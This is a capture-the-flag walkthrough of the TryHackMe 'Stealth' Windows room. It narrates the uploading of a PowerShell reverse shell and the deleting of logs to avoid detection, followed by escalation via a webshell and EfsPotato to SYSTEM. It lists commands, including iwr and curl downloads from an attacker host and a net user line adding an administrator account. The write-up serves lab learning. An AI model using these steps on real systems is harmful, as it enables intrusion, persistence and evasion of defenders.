We covered TryHackMe Stealth machine where we went over the typical stages of enumerating open ports and services with Nmap and we found an upload form that plays the role of Powershell script analyzer. We uploaded a reverse shell Powershell script to gain the first foothold but we made sure to delete all log files to keep the connection alive and prevent attracting the attention of the blue team. Then we used PrivescCheck script to enumerate for available privilege escalation vectors and we found that the current user has complete control over the web server process so we uploaded a webshell and executed the EfsPotato exploit to have SYSTEM access.

TryHackMe Stealth Challenge Description

Use your evasion skills to pwn a Windows target with an updated defence mechanism.

Initial Foothold & Evasion

My journey began with reconnaissance and gaining an initial shell:

  1. Scanning: I started with an nmap scan to identify open ports. The crucial ones I found were the RDP port and a web server running on multiple ports, notably port 8443 (HTTPS with an SSL certificate).
  2. Web Server Exploitation (First Shell): The web page on port 8443 had an upload form designed for analyzing PowerShell scripts (.ps1 files). I exploited this by uploading a PowerShell reverse shell to gain initial access. I used a script similar to PowerShell-reverse-shell.ps1, making sure to modify the IP address to my attacker machine’s IP.
  3. Log File Evasion: Once I got the reverse shell, I immediately noticed it was unstable. I quickly discovered that my attempts were being logged in two locations: a log file in a documents directory and another in the web server’s uploads directory (under xampp\htdocs\uploads), which logged the commands I executed. The critical part here was that if I didn’t delete these logs, the “Blue Team” would terminate my connection. My solution was to immediately delete both log files to maintain access.
  4. Stabilizing Access (Second Shell): In the uploads directory, I found another PowerShell script called vulnerable.ps1. I copied this script, modified it with my attacker IP and a different port, and re-uploaded it to get a more stable second shell. Again, I had to delete the log files immediately after establishing this connection. This second shell ran under the user context of “evader.”

Privilege Escalation

With a stable shell as the “evader” user, I moved on to privilege escalation:

  1. Initial Privilege Checks: I ran whoami /priv as the “evader” user, which showed limited privileges, not enough for direct escalation. Standard enumeration tools like WinPEAS and Watson were ineffective due to the machine’s protections.
  2. PowerShell Enumeration Script: I then used a PowerShell-based privilege escalation script (e.g., privescCheck.ps1). I downloaded this script to the target machine using iwr (Invoke-WebRequest) from a web server I hosted on my attacker machine. The script revealed that the “evader” user had full control over the web server processes.
  3. Webshell for Enhanced Privileges: To leverage this web server control, I uploaded a webshell (like “Pony”) to the web server’s root directory. I accessed this webshell via a different port where another instance of the web server was running (port 8080 in this case). Running whoami /priv from this webshell showed that the “evader” user now had the “SeImpersonatePrivilege”. This was a significant step!
  4. Exploiting SeImpersonatePrivilege with EFS Potato: I knew that several tools could exploit SeImpersonatePrivilege, including Juicy Potato, Rogue Potato, and EFS Potato. I focused on EFS Potato. I transferred the EFS Potato exploit to the target machine (likely via curl or iwr from my web server) and stored it in the web server directory. The exploit needed to be compiled on the target machine. I had to troubleshoot the .NET Framework version required for compilation, eventually finding the correct version (v4.0.30319). Once compiled, EFS Potato allowed me to execute commands as NT AUTHORITY\SYSTEM.
  5. Gaining System Access & Persistence: With SYSTEM access, I added a new user (“pawn”) to the machine and then added this user to the local administrators group using EFS Potato to execute the necessary net user commands. I noted some issues with password complexity and found a working password format. Finally, I used RDP to log in as my newly created administrator user (“pawn”) to retrieve the root flag.

Technical Commands I Used:

Here are the technical commands I executed on the terminal:

  • whoami /priv
  • python3 -m http.server <port> (Used for hosting files on my attacker machine, specifically python3 -m http.server 80)
  • iwr http://<attacker_IP>:<port>/<script_name> -OutFile <script_name> (Used for downloading scripts to the target)
  • .\privescCheck.ps1 -Extended (Running the privilege escalation script with extended checks)
  • curl http://<attacker_IP>:<port>/EfsPotato.exe -o EfsPotato.exe (Downloading EFS Potato)
  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:EfsPotato.exe EfsPotato.cs (Compiling EFS Potato)
  • .\EfsPotato.exe "whoami"
  • .\EfsPotato.exe "net user pawn <password> /add && net localgroup administrators pawn /add" (Adding a user and adding them to the administrators group)

Room Answers

What is the content of the user level flag?

What is the content of the root level flag?

Video Walkthrough

, ,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles